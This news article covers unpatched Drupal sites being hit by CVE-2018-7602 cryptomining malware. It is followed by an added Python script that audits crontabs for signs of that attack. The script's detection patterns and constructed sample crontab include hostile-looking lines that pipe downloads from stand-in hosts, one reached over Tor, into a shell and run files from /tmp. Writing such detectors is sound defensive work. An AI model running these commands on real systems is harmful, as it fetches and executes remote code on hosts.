July 25, 2018 4:00
by Shaurya Malwa

On July 23, 2018, the cybersecurity website Security Intelligence reported that several companies and software users remain susceptible to the infamous “Drupalgeddon virus,” despite Drupal Security Labs having released a software patch in March 2018 to fix the vulnerability.
According to the report, the earlier vulnerability, CVE-2018-7600 or “Drupalgeddon 2,” was found and patched by security researchers, who later discovered the CVE-2018-7602 vulnerability, which could be used to deliver illicit cryptocurrency-mining malware to victim computers. Founded in 2000, the open-source Drupal content management system is used by millions of users around the world, primarily by e-commerce and content management firms. While cyberattacks have hit the platform on numerous occasions, the CVE-2018-7602 attacks were the first instance of a cryptocurrency-centric criminal assault.
Because the relevant security patches were obscure, site owners and administrators were gravely affected until the vulnerability was found and patched by Drupal’s security experts. However, it is now known that several companies did not apply the required patch at the time, leaving themselves exposed today.
After infiltrating victim computers and hijacking their computing power, the malware delivered through CVE-2018-7602 mines Monero (XMR), the privacy-centric cryptocurrency. XMR is a hacker’s favorite cryptocurrency: more than 85 percent of all cryptojacking cases involve the digital asset, and hackers have stolen over $175 million worth of XMR in 2018 alone.
To execute the attack, cybercriminals exploit a remote code execution vulnerability known to affect Drupal versions seven and eight. As Trend Micro stated in June, the attack commences with a “shell script” download, followed by an “Executable and Linkable Format downloader to add a crontab entry.” Hackers circumvent embedded security protections to install mining malware, exploiting Drupal’s lack of “input sanitization of # characters in URLs.” Furthermore, bad actors use Tor routers to hide their activity.
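The chain described above (a downloaded shell script, a downloader that adds a crontab entry, Tor to hide traffic) leaves persistence artifacts that can be audited on a web server. The following is an added example, not code from the original article or from Trend Micro: a Python check that flags per-user crontab entries which pipe a download into a shell, run files from world-writable directories, or reference Tor. The patterns, function names and the sample crontab are assumptions constructed for illustration.

```python
import re

# Heuristics (assumed, not from the article) for suspicious cron commands.
FETCH = re.compile(r"\b(?:curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|da|z)?sh\b")
# A path under a world-writable directory in command position.
RUN_FROM_TMP = re.compile(
    r"(?:^|[;&|])\s*(?:(?:ba)?sh\s+|nohup\s+)*(?:/tmp|/var/tmp|/dev/shm)/\S+")
TOR = re.compile(r"\.onion\b|\btorsocks\b|--socks5", re.I)

def cron_command(line):
    """Return the command of a per-user crontab line, else None."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):              # @reboot, @hourly, ...
        parts = line.split(None, 1)
        return parts[1] if len(parts) == 2 else None
    parts = line.split(None, 5)           # five time fields + command
    return parts[5] if len(parts) == 6 else None  # skips VAR=value lines

def audit(lines):
    """Return [(line_number, [reasons])] for suspicious entries."""
    findings = []
    for number, line in enumerate(lines, 1):
        cmd = cron_command(line)
        if cmd is None:
            continue
        reasons = []
        if FETCH.search(cmd) and PIPE_TO_SHELL.search(cmd):
            reasons.append("download piped to shell")
        if RUN_FROM_TMP.search(cmd):
            reasons.append("runs file from world-writable dir")
        if TOR.search(cmd):
            reasons.append("Tor proxy or .onion host")
        if reasons:
            findings.append((number, reasons))
    return findings

# Constructed sample crontab (not taken from any real incident).
SAMPLE = [
    'MAILTO=""',
    "0 * * * * wget -O - -q -t 1 https://example.test/cron/KEY >/dev/null 2>&1",
    "*/5 * * * * curl -fsSL http://198.51.100.7/u.sh | sh",
    "@reboot /tmp/.cache/dl >/dev/null 2>&1",
    "*/10 * * * * curl --socks5-hostname 127.0.0.1:9050 -s http://example.onion/x | bash",
]

print(audit(SAMPLE))
```

The legitimate scheduled `wget` on line 2 of the sample is not flagged, because it neither pipes into a shell nor runs from a temporary directory; feed the function the output of `crontab -l` for the web-server account to audit a real host.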